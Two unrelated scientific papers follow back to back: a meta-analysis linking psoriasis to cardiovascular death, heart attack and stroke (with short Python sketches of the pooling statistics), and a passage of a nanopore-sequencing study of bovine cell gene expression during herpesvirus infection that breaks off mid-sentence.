Patients with psoriasis may also have an increased risk of major adverse cardiovascular events (MACE) beyond that attributable to measured cardiovascular risk factors. 9 In support of this theory, large epidemiologic studies have found increased rates of cardiovascular mortality, myocardial infarction (MI), and stroke among patients with both mild and severe psoriasis. [10][11][12] Shared inflammatory pathways, including TH1-mediated inflammation, alterations in angiogenesis, and endothelial dysfunction, may link the pathogenesis of psoriasis with the development of atherosclerosis and cardiovascular disease. 13,14 However, the magnitude of this association remains controversial, and it is uncertain whether the increased risk for MACE is limited only to patients with severe psoriasis.
To answer these questions, we performed a systematic review and meta-analysis of the association between psoriasis and cardiovascular death, MI, and stroke. We stratified our analysis by mild versus severe psoriasis and included adjusted risk estimates accounting for comorbidities. Based on these results, we also estimated the attributable risk of psoriasis to excess major adverse cardiovascular events in the US population.
Selection of Studies
We systematically searched the MEDLINE, EMBASE, and Cochrane Central Register databases with the following search terms: "Psoriasis" [ Our search was limited to English-language and human-only studies published between January 1, 1980, and January 1, 2012. The search yielded 558 results. All abstracts were read to determine eligibility for inclusion in the systematic review. To be included, original studies needed to fulfill the following inclusion criteria: case-control, cross-sectional, cohort, or nested case-control design; evaluation of MI, stroke, cardiovascular death, or composite cardiovascular end point in conjunction with psoriasis; and analyses that compared psoriasis patients with control groups. The studies had to evaluate the incidence of subsequent cardiovascular death, MI, or stroke, with these 3 entities defined as overall MACE. The end point could be identified by physical examination, patient self-report, medical chart review, or medical billing codes. A number of studies assessed MI or stroke prevalence but not incidence. These studies are detailed in Tables S1 and S2 but were not included in the analysis because they did not assess incidence.
Data Extraction and Clinical Endpoints
The Meta-Analysis of Observational Studies in Epidemiology (MOOSE) guidelines were used to guide analysis. 15 The systematic review and data extraction were performed independently by 3 reviewers (E.J.A., C.T.H., and A.W.A.), and any differences were adjudicated by consensus. For each study included, we recorded the study year, country in which the study population lived, setting in which the study took place, study design, numbers of case and control subjects, age, sex, statistical adjustments for comorbidities, data collection processes (prospective versus retrospective), whether the results were a primary or secondary analysis of the publication, and whether psoriasis disease severity was assessed. A previously validated 6-point scale was used to determine study quality, with values of 0 or 1 assigned to study design, assessment of exposure (psoriasis), assessment of outcome (major adverse cardiovascular events), control for confounding, evidence of bias, and assessment of psoriasis severity. Studies with a score of 0 to 3 were categorized as lower quality, whereas studies with scores of 4 to 6 were categorized as higher quality. 16 Most of the included studies were of either case-control or cohort design. One study assessed the combined outcome of MACE. 9 All others assessed MI, stroke, or cardiovascular death independently.
Statistical Analysis
Because prior studies have suggested a significant effect modification of psoriasis severity on cardiovascular outcomes, we stratified our analysis on the basis of patients with mild psoriasis versus patients with severe psoriasis. To estimate the pooled risk ratio (RR), the adjusted effect size and reported upper and lower bounds of the 95% confidence interval for each study were log-transformed. The inverse variance method was then applied with fixed-effects and random-effects models of DerSimonian and Laird. 17 Study heterogeneity was assessed using the I 2 statistic.
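For readers who wish to trace this pooling step, the computation can be sketched as follows. This is a minimal illustration using hypothetical study-level risk ratios and confidence intervals, not the values extracted from the included studies; the published analysis itself was performed in STATA.

```python
import math

# Hypothetical study-level risk ratios and 95% CIs (illustrative only,
# not the estimates extracted from the nine included studies).
studies = [(1.39, 1.11, 1.74), (1.53, 1.45, 1.60), (1.14, 0.89, 1.46)]

# Log-transform effect sizes; recover each study's standard error from the
# width of its 95% CI on the log scale (CI width = 2 * 1.96 * SE).
y = [math.log(rr) for rr, lo, hi in studies]
se = [(math.log(hi) - math.log(lo)) / (2 * 1.96) for rr, lo, hi in studies]
w = [1 / s**2 for s in se]                      # inverse-variance weights

# Fixed-effects pooled estimate and Cochran's Q
y_fe = sum(wi * yi for wi, yi in zip(w, y)) / sum(w)
q = sum(wi * (yi - y_fe)**2 for wi, yi in zip(w, y))
df = len(studies) - 1
i2 = max(0.0, (q - df) / q) * 100 if q > 0 else 0.0  # I^2 heterogeneity

# DerSimonian-Laird between-study variance tau^2, then random-effects pool
c = sum(w) - sum(wi**2 for wi in w) / sum(w)
tau2 = max(0.0, (q - df) / c)
w_re = [1 / (s**2 + tau2) for s in se]
y_re = sum(wi * yi for wi, yi in zip(w_re, y)) / sum(w_re)
se_re = math.sqrt(1 / sum(w_re))

print(f"RE pooled RR = {math.exp(y_re):.2f} "
      f"(95% CI {math.exp(y_re - 1.96 * se_re):.2f} "
      f"to {math.exp(y_re + 1.96 * se_re):.2f}), I2 = {i2:.1f}%")
```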
Risk ratios were used to calculate the excess risk for cardiovascular mortality, MI, and stroke among patients with psoriasis. Because 2 studies used standardized mortality ratios based on a population sample, we assumed that the control groups in each case consisted of an equal number of patients matched by age and sex with the same duration of follow-up as the psoriasis group. 18,19 In cases in which the total number of patient-years of follow-up was not reported, we integrated the mean of the aggregate data. 18 In another study, the total patient-years of follow-up were available, but the total number of events was not reported. 20 We therefore estimated the number of events on the basis of the size of the cohort and the reported events/1000 patient-years.
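As a worked illustration of this reconstruction (with placeholder numbers rather than those of the cited cohorts), an incidence rate reported per 1000 patient-years converts to an event count as follows:

```python
# Hypothetical reconstruction of a missing event count from a reported
# incidence rate and the cohort's total follow-up time.
total_patient_years = 36_500   # placeholder follow-up, not a study value
rate_per_1000_py = 5.2         # placeholder events per 1000 patient-years

estimated_events = rate_per_1000_py * total_patient_years / 1000
print(round(estimated_events))  # -> 190
```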
Publication bias was assessed using visual inspection of a funnel plot of study size versus standard error, with formal statistical testing using the Begg adjusted rank correlation test. 21,22 To explore sources of study heterogeneity, we performed meta-regression using prespecified variables and fixed-effects meta-analysis. Prespecified sources of heterogeneity included study country, subject location (ambulatory or inpatient), multivariate adjustment for confounders, prospective versus retrospective study design, primary versus secondary analysis, ascertainment of psoriasis disease severity, measure of outcome, and study quality (0 to 3 versus 4 to 6).
To calculate the population attributable risk of psoriasis on major adverse cardiovascular events, we used the most current statistics from the American Heart Association, 23 which are based on 2008 US census data. 24 We assumed that a total of 7.5 million people in the United States have psoriasis, and that 10% of patients with psoriasis have severe psoriasis. 25 All analyses were performed using STATA Version 11.2 (STATA Corp, College Station, TX). All statistical tests were 2 sided, with a significance level of <0.05.
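The attributable-risk arithmetic can be sketched briefly. The prevalence assumptions (7.5 million patients with psoriasis, 10% of them severe) are taken from the text above; the background MI incidence below is a placeholder rather than the actual American Heart Association figure, so the output is illustrative only.

```python
# Sketch of the population attributable-risk arithmetic described above.
total_psoriasis = 7_500_000          # assumed US psoriasis population
severe = 0.10 * total_psoriasis      # assumed 10% severe
mild = total_psoriasis - severe

baseline_mi_rate = 3.0 / 1000        # hypothetical annual MI incidence
rr_mild, rr_severe = 1.29, 1.70      # pooled RRs reported in this analysis

# Excess events = prevalence x baseline rate x (RR - 1), summed by stratum
excess_mi = (mild * baseline_mi_rate * (rr_mild - 1)
             + severe * baseline_mi_rate * (rr_severe - 1))
print(f"Estimated excess MIs per year: {excess_mi:,.0f}")
```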
Study Selection
From the initial 558 search results, 108 full-text articles were chosen for further review. Among these full-text articles, 26 studies were excluded because they were reviews; 20 were letters, commentaries, or case reports; 12 exclusively assessed psoriatic arthritis (PsA) patients; 15 assessed cardiovascular risk factors only; 13 did not measure the association between psoriasis and MACE; 6 were of the same cohort as prior studies; and 7 assessed prevalence of MI or stroke but not incidence (Tables S1 and S2). [26][27][28][29][30][31][32] Nine studies were therefore included in the meta-analysis ( Figure 1). 11,12,[18][19][20][33][34][35][36] Studies with significant cohort overlap (eg, in which multiple studies used the General Practice Research Database [GPRD] in overlapping periods) were included only once. 9,10,[37][38][39] In each case, the study with the highest-quality measure and most complete reporting was included.
The baseline characteristics of each study, stratified by mild versus severe psoriasis, are shown in Tables 1 and 2. Two studies used standardized mortality ratios based on the expected mortality among patients matched for age and sex, 18,19,37 whereas other studies used hazard ratios or rate ratios. Study designs included nested case-control, isolated cohorts based on practice patterns, or whole-country cohort design. All studies except 1 differentiated mild from severe psoriasis, as defined by either inpatient status, need for phototherapy, or use of systemic medications. 34
Quality of the Studies and Publication Bias
All studies were observational and included sufficient followup to determine the end point of interest. All studies were deemed high quality (score of 4 or greater) using a prespecified 6-point quality scale. Variable levels of covariate adjustment were performed (Tables 1 and 2), with all studies adjusting for age and sex, but only some studies including full adjustment for other medical comorbidities. The studies of cardiovascular mortality adjusted only for age, sex, and some medical comorbidities, whereas studies of myocardial infarction and stroke in general included more complete covariate adjustment. No evidence of publication bias was detected for cardiovascular mortality (P=0.7), MI (P=0.5), or stroke (P=0.9) using visual inspection of a funnel plot and formal testing with the Egger test.
Because observational studies may also have significant between-study heterogeneity in design and cohort selection, we also performed meta-regression analysis for the end points of cardiovascular mortality and MI (CV death in mild psoriasis and stroke were not included in meta-regression testing because of identification of only 2 studies for each of these analysis subgroups and no significant between-study heterogeneity). There was an association between study country and the strength of association of severe psoriasis with cardiovascular mortality (P=0.01), largely because the 1 US-based study of cardiovascular mortality had a smaller reported RR than the other, European-based studies. 19 All other prespecified meta-regression analyses were not statistically significant (Tables S3 through S5).
Cardiovascular Mortality
Cardiovascular mortality was studied among 4 cohorts, including patients from the United States, United Kingdom, Sweden, and Denmark ( Figure 2). A total of 54 128 patients with mild psoriasis were studied. Only 2 studies addressed cardiovascular mortality among patients with mild psoriasis. The 2 studies had discordant findings, leading to no statistically significant association (RR, 1.03; 95% CI, 0.86 to 1.25) on meta-analysis.
Among 16 591 patients with severe psoriasis, there was a significantly increased risk of cardiovascular mortality during long-term follow-up ranging from 2.7 to 22.4 years (RR, 1.39; 95% CI, 1.11 to 1.74). Discordant outcomes between the European-based and US-based studies accounted for all the between-study heterogeneity (I 2 =91.1% before exclusion, I 2 =0 after exclusion). If the meta-analysis was restricted to the 3 European-based studies, the RR for cardiovascular mortality among patients with severe psoriasis increased to 1.53 (95% CI, 1.45 to 1.60). The incidence rate per 1000 person-years for cardiovascular mortality among patients with severe psoriasis ranged from 3.1 to 16.2 ( Table 2).
Myocardial Infarction
Myocardial infarction was studied among 4 cohorts ( Figure 3). There was a significantly increased risk of MI among patients with both mild psoriasis (RR, 1.29; 95% CI, 1.02 to 1.63) and severe psoriasis (RR, 1.70; 95% CI, 1.32 to 2.18).

Stroke

Two studies assessed the risk of incident stroke among patients with psoriasis ( Figure 4). Among 165 908 patients with mild psoriasis, the RR for stroke was 1.12 (95% CI, 1.08 to 1.16). Among 6396 patients with severe psoriasis, the RR for stroke was 1.56 (95% CI, 1.32 to 1.84). Both of these studies were derived from large European-based cohorts and used medical codes. In 1 study, patients with psoriasis were identified on the basis of medical prescriptions, and the analysis only included treated patients. 36 The incidence rate per 1000 person-years for stroke ranged from 3.7 to 5.0 for patients with mild psoriasis and from 6.1 to 6.8 for patients with severe psoriasis.
Attributable Risk Estimate of Psoriasis
Using the most current background rates of cardiovascular mortality, myocardial infarction, and stroke in the US population, we calculated the population attributable risk of psoriasis on major adverse cardiovascular events (Table 3). On the basis of these estimates and pooling results from patients with mild and severe psoriasis, psoriasis in the United States is associated with an estimated 1269 (95% CI, −2208 to 5741) excess deaths from cardiovascular causes, 6479 (95% CI, 979 to 13 409) excess MIs, and 3782 (95% CI, 2399 to 5258) excess strokes each year, for an estimated total of >11 500 (95% CI, 1169 to 24 407) excess major adverse cardiovascular events each year.
Discussion
The association between psoriasis and cardiovascular disease has gained increased attention in the past 5 years. Although psoriasis was once thought to be a disease limited to the skin, there is increasing awareness that patients with psoriasis have a number of associated medical comorbidities. These comorbidities may significantly affect quality of life and also place patients with psoriasis at higher risk of subsequent medical problems. Although many of the initial studies examining psoriasis and comorbidities assessed only the prevalence of risk factors, a number of recent cohort studies have assessed incident cardiovascular events among patients with psoriasis. In this meta-analysis, we systematically assessed the incidence of MACE among patients with psoriasis to better understand the magnitude of this association and the additional contribution of psoriasis to cardiovascular disease. In our analysis, we found that both mild and severe psoriasis were associated with significantly increased risk of MI and stroke. In addition, severe psoriasis was associated with significantly increased cardiovascular mortality. The strength of the association for MI and stroke was greater for severe than for mild psoriasis, further supporting a possible dose-response relationship between disease severity and the excess risk of cardiovascular disease. On the basis of the pooled risk ratios for mild and severe psoriasis, we estimated that psoriasis accounts for an additional approximately 11 000 major adverse cardiovascular events/year in the United States. Although the relative risk of MACE is greater for patients with severe compared with mild psoriasis, the greater population prevalence of mild psoriasis actually translates into a greater population attributable risk of mild psoriasis for both MI and stroke. These findings emphasize that all patients with psoriasis, rather than only those with severe psoriasis, should be educated regarding an increased risk of cardiovascular disease.
Prior studies have suggested an age interaction between psoriasis and cardiovascular risk, with younger patients having a significantly higher relative risk for cardiovascular disease than older patients. 11 These risk estimates may reflect the bimodal incidence of psoriasis, with a differential effect of early-onset psoriasis on progression of atherosclerosis. Alternatively, the development of additional cardiovascular risk factors coincident with aging may eventually outweigh the additional risk of psoriasis to cardiovascular disease. However, we recently found that even among older patient cohorts, patients with psoriasis undergoing coronary angiography were more likely to have coronary artery disease. 40 Although we could not adjust in this meta-analysis for an age-dependent effect of psoriasis on cardiovascular outcomes, these findings should be widely applicable to the cohorts studied, in which the mean age ranged from 45 to 52 years of age. This age group represents a common age at which intervention into cardiovascular risk factors can substantially modify future cardiovascular risk.
Currently, no specific treatments exist for modification of cardiovascular risk independent of standard risk factors. In the absence of specific treatments, recognition of modifiable risk factors remains paramount. Recent survey results suggest that most physicians are not aware of the association between psoriasis and cardiovascular disease and that patients with psoriasis are not adequately screened for medical comorbidities. 41,42 Once these modifiable conditions are recognized, aggressive lifestyle modification and medical intervention may be warranted. Recognizing the additional contribution of psoriasis to cardiovascular disease may also result in reclassification of a number of patients from low- or medium-risk based on Framingham risk scores to a higher-risk category. 43 It is possible that treatment of psoriasis with systemic medications may independently affect cardiovascular outcomes. Methotrexate, which is commonly prescribed in cases of moderate to severe psoriasis, may reduce the risk of cardiovascular events, although most of this evidence is observational and based on patients with rheumatoid arthritis. 44 TNF-alpha inhibitors are increasingly used in the management of patients with moderate to severe psoriasis. Randomized trials with short duration of follow-up showed no effect of TNF-alpha inhibitors on cardiovascular events. 45 Recently published observational data suggest that TNF-alpha inhibitors may be associated with reduced incidence of cardiovascular events among patients with psoriasis. 46 In addition, treatment of psoriasis with TNF-alpha inhibitors may reduce the incidence of diabetes, thereby reducing long-term cardiovascular risk. 47 Although there is some concern that more recent IL-12/23 inhibitors may increase cardiovascular mortality, a recent meta-analysis failed to find any association between these agents and cardiovascular events. 45 Further research will be necessary to better delineate the effect of these systemic medications on cardiovascular events.
This study should be interpreted in the context of its design. First, observational studies have inherent limitations, including unmeasured confounders and between-study heterogeneity. The included studies, however, were all high quality and included effect sizes that were adjusted. Second, a potential major limitation of this analysis is the extent of covariate adjustment performed in each primary study. For example, studies of cardiovascular mortality did not adjust for important covariates, including smoking and diabetes, both of which are known to occur with greater prevalence among patients with psoriasis. It is therefore possible that the apparent independent effect of psoriasis on cardiovascular mortality is partly attributable to incomplete covariate adjustment. The studies of myocardial infarction and stroke used more complete covariate adjustment including smoking and diabetes status, but not all these studies adjusted for body mass index, and patients with psoriasis are known to have a higher prevalence of obesity when compared with the general population. These analyses emphasize that future epidemiologic studies should include a more thorough assessment of cardiovascular risk factors among well-defined cohorts of patients with psoriasis. Third, the majority of the studies used billing codes and/or medication prescriptions to identify patients with psoriasis. The study population therefore represents patients with treated psoriasis and may not reflect the entire, often undertreated population of patients with psoriasis. Furthermore, the definition of severe psoriasis varied between studies. Most cohorts identified only 3% to 10% of patients as having severe psoriasis, whereas recent estimates based on percent body surface area involvement suggest that 15% to 20% of patients with psoriasis have a moderate to severe form of the disease. 25 Whether such patients have an intermediate risk profile between that of patients with mild versus severe psoriasis is uncertain. Fourth, the studied cohorts range over the last 1 to 3 decades. A number of new therapies have been developed for psoriasis in the past decade, and it is possible that these therapies have altered the current epidemiology of cardiovascular disease among patients with psoriasis.
In conclusion, this meta-analysis supports a significant association between psoriasis and incidence of major adverse cardiovascular events, with a significant population attributable risk of psoriasis. Patients with psoriasis should be educated regarding the increased risk of cardiovascular disease and aggressively treated for modifiable cardiovascular risk factors. Further research into the mechanisms linking psoriasis with cardiovascular disease is warranted and may provide insights into both pathogenesis and treatment.
Disclosures
Dr Ehrin Armstrong and Dr Harskamp have no disclosures. Dr April Armstrong has served as an investigator for and an advisor to AbbVie, Amgen, Janssen, Eli Lilly, Merck, and Pfizer. | 2017-04-06T00:01:52.842Z | 2013-04-01T00:00:00.000 | {
"year": 2013,
"sha1": "8d05aa62a247a2f38b75f86d404cc72f05080e06",
"oa_license": "CCBY",
"oa_url": "https://www.ahajournals.org/doi/pdf/10.1161/JAHA.113.000062",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "b8647939054f2aaa564376d04f2084cf8f53a047",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
243028547 | pes2o/s2orc | v3-fos-license | Long-read Time-course Profiling of the Host Cell Response to Herpesvirus Infection Using Nanopore and Synthetic Long-Read Transcriptome Sequencing
Third-generation sequencing is able to read full-length transcripts and thus to efficiently identify RNA molecules and transcript isoforms, including transcript length and splice isoforms. In this study, we report the time-course profiling of the effect of bovine alphaherpesvirus type 1 on the gene expression of bovine epithelial cells using direct cDNA sequencing carried out on the MinION device of Oxford Nanopore Technologies. These investigations revealed a substantial up- and down-regulatory effect of the virus on several gene networks of the host cells, including those that are associated with antiviral response, as well as with viral transcription and translation. Additionally, we report a large number of novel bovine transcripts identified by nanopore and synthetic long-read sequencing. This study demonstrates that viral infection does not lead to a change in the average distance between promoters and transcription start sites, or between polyadenylation signals and transcription end sites. However, it causes differential expression of transcript isoforms. We could not detect an increased rate of transcriptional readthroughs as described in another alphaherpesvirus. According to our knowledge, this is the first report on the use of LoopSeq for the analysis of eukaryotic transcriptomes. This is also the first report on the application of nanopore sequencing for the kinetic characterization of cellular transcriptomes. This study also demonstrates the utility of nanopore sequencing for the characterization of dynamic changes of transcriptomes in any organism. Based on our Gene Ontology (GO) biological and molecular function analysis of the gene expression clusters, we distinguished three functional groups. Genes involved in basic cell functions, including morphogenesis, cell cycle regulation, signaling, catabolic pathways and respiration, are generally downregulated during viral infection. On the other hand, we observed a considerable upregulation of genes involved in antiviral response. Additionally, genes playing a role in transcription, RNA decay, translation and protein folding were also upregulated. Our analysis shows that most of these genes are associated with distinct molecular functions and biological processes, indicating a general response to virus infection. However, the rest of the unassociated genes could also be associated with either susceptibility to or defense against viral infection. We also identified a small set of immediate response genes that exhibited significantly altered expression 1 hour after viral infection.
Introduction
Bovine alphaherpesvirus type 1 (BoHV-1) is a large DNA virus belonging to the Alphaherpesvirinae subfamily. This virus infects cattle and causes the disease commonly known as bovine respiratory disease, which leads to severe economic losses annually worldwide (van Oirschot, 1995). Like other alphaherpesviruses, such as herpes simplex virus type 1 (HSV-1), or pseudorabies virus (PRV), BoHV-1 also enters a latent state most commonly in the trigeminal ganglia following primary infection (Jones, 1998). From this state, the virus can be reactivated by various types of stress and can re-establish an acute infection (Nataraj et al., 1997).
Short-read sequencing (SRS) technology has expanded the frontiers of genomic and transcriptomic research due to its capacity to collect vast quantities of sequencing data at a relatively low cost. However, the past decade has witnessed incredible advances in long-read sequencing (LRS) technology. Besides the Pacific Biosciences and Oxford Nanopore Technologies platforms, Loop Genomics has recently also developed an LRS technique based on single-molecule synthetic long-read sequencing (LoopSeq). LRS approaches present a strategy that is able to elude the limitations of SRS, including its ineffectiveness in the identification of transcript isoforms and in distinguishing overlapping RNA molecules. Recently, LRS techniques have been widely applied for the transcriptome analysis of a variety of organisms (Byrne et al., 2017;Chen et al., 2017;Tombácz et al., 2018a;Boldogkői et al., 2019;Zhao et al., 2019), including herpesviruses (Balázs et al.). These studies have uncovered a far more complex transcriptional landscape of the examined species than previously thought. Genome-wide sequencing assays have annotated the global transcriptome of BoHV-1 (Moldován et al., 2020), including microRNAs (Glazov et al., 2010). The effect of herpesvirus infection on host cell transcription using SRS (Illumina HiSeq) has been characterized by Hu et al. (2016). In this paper, the authors described alternative splicing and polyadenylation in human skin fibroblast cells due to infection by HSV-1.
In this work, we carried out a time-lapse assay for the examination of the effect of BoHV-1 infection on the gene expression of bovine epithelial cells.
Pre-processing and data analysis
The MinION data was base called using the Guppy base caller v. 3.4.1. with --qscore_filtering. Reads with a Q-score greater than 7 were mapped to the host genome [Bos taurus GenBank accession GCF_002263795.1] using the Minimap2 aligner (Li, 2018).
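As background for the Q-score cutoff: nanopore per-read quality is conventionally derived from the mean per-base error probability rather than the arithmetic mean of Phred values. A minimal sketch of the Q > 7 filter under that assumption (the exact Guppy internals may differ) is:

```python
import math

def read_qscore(quals):
    """Mean read quality in the ONT sense: convert per-base Phred scores to
    error probabilities, average them, and convert back to a Phred value."""
    probs = [10 ** (-q / 10) for q in quals]
    return -10 * math.log10(sum(probs) / len(probs))

def passes_filter(quals, threshold=7.0):
    return read_qscore(quals) > threshold

# Example: a read whose per-base qualities hover around Q10 passes Q7.
print(passes_filter([10, 12, 8, 9, 11, 10]))  # True
```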
Analysis of host cell gene expression
In order to assess the effect of the infection on host gene expression, we excluded MAPQ=0, secondary and supplementary alignments from all downstream analysis. The reads aligned to the host genome were associated to host genes according to the GCF_002263795.1_ARS-UCD1.2_genomic.gff genome coordinates. Only reads matching the exon structure of the host reference genes (using a +/-5 base pair window for matching exon start and end positions) were counted. We used edgeR_3.24.3 (McCarthy et al., 2012) with R version 3.5.1 for differential expression (DE) analysis, and filtered out host genes with less than ten reads in any of the three biological replicates. Since we had mock, 1h, 2h, 4h, 6h, 8h, 12h measurements, we used the GLM model (robust=True) and the TMM normalization method in the edgeR analysis. In our model, we tested for DE against mock expression for each time point using data from three biological replicates. To detect genes with significantly changed expression levels, we applied a 0.01 false discovery rate (FDR) threshold, with p-values adjusted by the Benjamini & Hochberg procedure.
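The ±5 bp exon-boundary matching rule can be illustrated with a short sketch; this is not the LoRTIA implementation, only an illustration of the counting criterion:

```python
def matches_exon_structure(read_exons, ref_exons, window=5):
    """Return True if a read's exon chain matches a reference transcript's
    exon chain, allowing each exon boundary to deviate by +/- `window` bp.
    Exons are (start, end) tuples on the same chromosome and strand."""
    if len(read_exons) != len(ref_exons):
        return False
    return all(abs(rs - fs) <= window and abs(re - fe) <= window
               for (rs, re), (fs, fe) in zip(read_exons, ref_exons))

# A read whose exon boundaries sit within 5 bp of the annotation is counted.
read = [(100, 203), (310, 455)]
ref = [(98, 200), (312, 450)]
print(matches_exon_structure(read, ref))  # True
```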
Medians of normalized pseudo-counts of DE genes were exported from edgeR (Supplementary Table S1). Gene expression levels were normalized to maximal expression levels and were then compared to each other to reveal which genes had similar expression kinetics during viral infection. Genes were clustered by their relative expression profile using the amap_0.8-16 R package Kmeans function with the Euclidean distance method. Based on the Calinski criterion, our dataset had an optimal cluster number of 6. Using the identified subset of genes, we performed overrepresentation analysis for each cluster using the number of expressed genes as reference via the PANTHER (version 14.1 using the 2018_04 dataset release) (Mi et al., 2013) software tool. We summarized the results of our over-representation analysis (FDR<0.05) using the Gene Ontology (GO) biological processes and GO molecular functions annotation datasets.
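The clustering itself was done with the Kmeans function of the amap R package; a roughly equivalent sketch in Python, with synthetic data standing in for the real pseudo-counts, might look like this:

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import calinski_harabasz_score

# Hypothetical matrix of median pseudo-counts: rows = DE genes,
# columns = time points (mock, 1h, 2h, 4h, 6h, 8h, 12h).
rng = np.random.default_rng(0)
counts = rng.gamma(shape=2.0, scale=50.0, size=(686, 7))

# Normalize each gene to its own maximum so clustering reflects the shape
# of the expression profile rather than absolute abundance.
profiles = counts / counts.max(axis=1, keepdims=True)

# Pick k by the Calinski-Harabasz criterion (the study settled on k = 6).
scores = {}
for k in range(2, 10):
    labels = KMeans(n_clusters=k, n_init=10, random_state=0).fit_predict(profiles)
    scores[k] = calinski_harabasz_score(profiles, labels)
best_k = max(scores, key=scores.get)
print("best k by Calinski-Harabasz:", best_k)
```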
Schematic representation of the workflow is shown in Supplementary Figure S1.
Annotation of Bos taurus transcripts
In this work, we applied the following techniques for the analysis of the bovine transcriptome: (1) direct cDNA sequencing (dcDNA-Seq) based on oligo(dT)-primed reverse transcription (RT), (2) amplified cDNA sequencing based on random-oligonucleotide-primed RT using nanopore sequencing on the ONT MinION platform, as well as (3) synthetic long-read sequencing (LoopSeq) on the Illumina platform. All three techniques were used for bovine transcript annotation, whereas dcDNA-Seq was used for the time-varying analysis of the effect of BoHV-1 on host cell gene expression. For transcript detection and annotation, mapped reads were analyzed using the LoRTIA software suite developed in our laboratory (https://github.com/zsolt-balazs/LoRTIA).
For the annotation of introns, transcription start sites (TSSs), and transcription end sites (TESs), we set the criterion that these sequences have to be identified by the LoRTIA suite in at least two independent bovine cell samples. With this restriction, we identified altogether 11,025 TSSs, 21,317 TESs and 139,771 introns (Supplementary Table S2). Additionally, LoRTIA produced a total of 227,672 bovine transcripts (Supplementary Data Item S1). The median length of these transcripts was 1,678 nt (σ = 2,386.5).
Three biological replicates were prepared for each time point in the dcDNA sequencing used for the time-lapse experiment. Seven time points post infection (p.i.) and a mock-infected sample were used in each replicate for this part of the analysis ( Supplementary Fig. S1).
We identified consensus TATA boxes at a mean distance of 31.15 nt (σ = 2.96) upstream of bovine TSSs.
The polyadenylation signals (PASs) were located at a mean distance of 25.35 nt (σ = 8.26) upstream of the host TESs. Our data show that viral infection does not induce significant changes in the distance between promoters and TSSs, or between PASs and TESs ( Figure 1A and 1B). No significant modification was found in the sequence of the ±5 nt region surrounding the TSSs or the ±50 nt region surrounding bovine gene TESs during the infection ( Figure 1C and 1D).
To assess changes in splicing, and the usage of TSSs and TESs of the host cell during BoHV-1 infection, we evaluated transcripts represented by more than ten reads in the infected samples (n = 69,726) reported by LoRTIA. We detected altogether 130 alternatively spliced transcripts ( Figure 2A).
FOS, an immediate responder of the stress signaling pathway, is quickly degraded if its third intron is retained (Jurado et al., 2007). We detected a non-spliced variant of FOS in very low abundance and additional splice variants of the transcript lacking the above-mentioned intron, which were present starting from the first hour of the infection ( Figure 2B). This confirms previous reports on the presence of FOS in the early stages of viral infections (Rubio and Martin-Clemente, 1999;Hu et al., 2016).
The 3'-UTRs of genes often contain miRNA targets, contributing to mRNA degradation. Thus, a shorter 3'-UTR can lead to increased transcript stability (Mayr and Bartel, 2009), whereas longer 3'-UTRs can be targeted by several miRNAs and other trans-acting elements, thereby generating distinct regulation patterns (Pereira et al., 2017). We detected 72 transcripts with TESs located further downstream and 122 transcripts with TESs located more upstream compared to transcripts in mock samples. Superoxide dismutase 1 (SOD1) confers protection against oxidative damage (Miao and St. Clair, 2009), including that induced by IFN-I signaling (Bhattacharya et al., 2015). A 3'-UTR isoform of SOD1 detected in infected cells was shorter than that found in the mock sample ( Figure 2C).
A previous work reported the disruption of transcript termination in the host caused by HSV-1 infection, resulting in extensive transcriptional overlaps between adjacent gene products (Rutkowski et al., 2015). According to our results, the length of polyadenylated transcripts remained constant during the infection (Figure 3). In order to investigate whether disruption of transcript termination also occurs in BoHV-1-infected bovine cells and results in non-polyadenylated transcripts, we carried out ONT sequencing based on random oligonucleotide-primed RT, and the obtained dataset was used for the analysis of transcription activity at the intergenic regions. Despite this library yielding a comparable number of reads mapping to Bos taurus (n=2,222,987), we were unable to detect any substantial amount of fragments mapping to the intergenic regions.
Using LRS, we were able to differentiate between TSS isoforms. We detected 80 transcripts with upstream and 142 with downstream TSSs.
Overall host cell gene expression during the 12 hours of virus infection
This study investigated the effect of viral infection on cultured bovine cells by a time-course transcriptome analysis using ONT LRS. We carried out direct cDNA sequencing using three biological replicates in each of the six time points (1h, 2h, 4h, 6h, 8h, 12h) and in the mock-infected sample. We identified a total of 8,342 host genes that produced more than ten transcripts in each of the three biological replicates. Applying differential expression (DE) analysis with a 0.01 false discovery rate (FDR) threshold, we identified 686 genes among the 8,342 host genes that exhibited significantly altered expression levels during the course of virus infection. Genes were clustered by their expression profile and not by their absolute expression levels. In this part of the analysis, we transformed the time series of expression levels to a relative scale representing the expression changes between sampling points. This allowed us to cluster the genes by their expression profiles during the course of viral infection instead of by their absolute abundance. We identified six clusters of genes with distinctive expression profiles ( Figure 4A and 4B and Supplementary Table S3). By analyzing the mean expression profiles of gene clusters, we identified four groups of genes (clusters 2-5) that were constantly upregulated, a single group of genes whose expression levels were steadily downregulated throughout the entire period of virus infection (cluster 6), and finally, one group that showed initial upregulation followed by downregulation (cluster 1).
We performed an over-representation analysis using the 8,342 genes as reference with the PANTHER software tool. We summarized the results of this analysis using GO (Gene Ontology) biological processes and GO molecular functions annotation datasets in Supplementary Table S3 (an FDR<0.05 was used). Over-represented genes were categorized into six functional groups according to the GO database ( Figure 4C) as follows: 296 genes play a role in cellular metabolism, 257 are involved in transcription and RNA decay, 242 in developmental and morphogenetic processes, 187 in immune response and host defense, 161 in translation and protein folding, whereas 61 genes are specifically associated with viral transcription-related processes.
Genes of the first cluster (n=53) had medium expression preceding the infection (which was transiently slightly upregulated at the 1h and 2h p.i. time points), followed by downregulation at later measurements.
Genes in this cluster were over-represented in pathways controlling a wide variety of developmental and morphogenetic processes. Several genes coding for transcription regulatory proteins present in this cluster show diminishing expression throughout the infection. Genes involved in the cytokine regulation of the immune response and inflammatory processes are also affected. The second and third clusters of genes (n=64 and n=82, respectively) had medium expression preceding the infection that rose at each consecutive time point. The genes of these clusters were over-represented in functions and molecular processes that can be associated with viral gene expression and virion assembly. An upregulation of genes involved in transcriptional and translational processes, as well as RNA decay, was also observed. RNA decay can be an immediate response of the host cell to counteract the accumulation of viral transcripts, or it may be an effort of the virus to eliminate competing host mRNAs in order to facilitate the translation of viral transcripts (Smiley, 2004;Moon and Wilusz, 2013). Some of the over-represented genes in these clusters are members of GO molecular function categories that have overlapping sets of genes. For example, the 12 genes (RPS26, RPL5, RPL30, RPS29, RPL31, RPS6, RPL36, RPL37, RPL8, RPS10, RPS21, RPL19) that were significantly upregulated during infection are members of both the "viral transcription" and the "SRP-dependent co-translational protein 